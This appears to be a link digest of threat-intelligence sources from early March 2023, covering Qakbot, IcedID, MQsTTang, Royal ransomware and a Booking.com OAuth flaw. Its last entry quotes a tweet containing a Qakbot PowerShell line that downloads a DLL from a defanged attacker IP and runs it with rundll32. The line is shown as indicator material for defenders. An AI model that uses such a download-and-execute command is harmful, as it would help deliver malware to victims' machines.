VirusTotal - File - 6019120f81c432820354fd7763baa7c6bd4611e92813a8b0e5edf0a342472f16
https://www.virustotal.com/gui/file/6019120f81c432820354fd7763baa7c6bd4611e92813a8b0e5edf0a342472f16/details
Salt Labs | Traveling with OAuth - Account Takeover on Booking.com
https://salt.security/blog/traveling-with-oauth-account-takeover-on-booking-com
MQsTTang: Mustang Panda’s latest backdoor treads new ground with Qt and MQTT | WeLiveSecurity
https://www.welivesecurity.com/2023/03/02/mqsttang-mustang-panda-latest-backdoor-treads-new-ground-qt-mqtt/
IcedID/icedID_02.03.2023.txt at main · pr0xylife/IcedID · GitHub
https://github.com/pr0xylife/IcedID/blob/main/icedID_02.03.2023.txt
Qakbot/Qakbot_BB17_02.03.2023.txt at main · pr0xylife/Qakbot · GitHub
https://github.com/pr0xylife/Qakbot/blob/main/Qakbot_BB17_02.03.2023.txt
Cybersecurity and Infrastructure Security Agency on Twitter: "We published a cybersecurity advisory with our @FBI partners that provides technical details and #IOCs on #RoyalRansomware being used to target wide range of critical infrastructure sectors. Reduce your risk & help us #StopRansomware: https://t.co/ZBCbMBcXjr https://t.co/RouwJNYsW7" / Twitter
https://twitter.com/CISAgov/status/1631357501764403203
Malware-Traffic-Analysis.net - 2023-03-02 - Rig EK --> malware loader --> Redline Stealer
https://www.malware-traffic-analysis.net/2023/03/02/index.html
Microsoft releases Windows security updates for Intel CPU flaws
https://www.bleepingcomputer.com/news/microsoft/microsoft-releases-windows-security-updates-for-intel-cpu-flaws/
Chinese Hackers Targeting European Entities with New MQsTTang Backdoor
https://thehackernews.com/2023/03/chinese-hackers-targeting-european.html
#StopRansomware: Royal Ransomware | CISA
https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-061a
RPC Programming for the Aspiring Windows Developer - TrustedSec
https://hubs.ly/Q01DXc-n0
National-Cybersecurity-Strategy-2023.pdf
https://www.whitehouse.gov/wp-content/uploads/2023/03/National-Cybersecurity-Strategy-2023.pdf
proxylife on Twitter: "#Qakbot - BB17 - .pdf > Onedrive > .js > .ps > .dll wscript Document#33088.DOCX .js powershell $path = "C:\Users\Public\Documents\ssd.dll"; $url1 = 'http://138.197.74.]198/eRV/020'; $web.DownloadFile($url, $path); rundll32.exe ssd.dll,RS32 IOC's https://t.co/bjyyBDwdeU https://t.co/0QiS3nVy8a" / Twitter
https://twitter.com/pr0xylife/status/1631372782087880704![proxylife on Twitter: "#Qakbot - BB17 - .pdf > Onedrive > .js > .ps > .dll wscript Document#33088.DOCX .js powershell $path = "C:\Users\Public\Documents\ssd.dll"; $url1 = 'http://138.197.74.]198/eRV/020'; $web.DownloadFile($url, $path); rundll32.exe ssd.dll,RS32 IOC's https://t.co/bjyyBDwdeU https://t.co/0QiS3nVy8a" / Twitter](/image/screenshot/e982e13007c399ebdc5007cbec36d4c6.webp)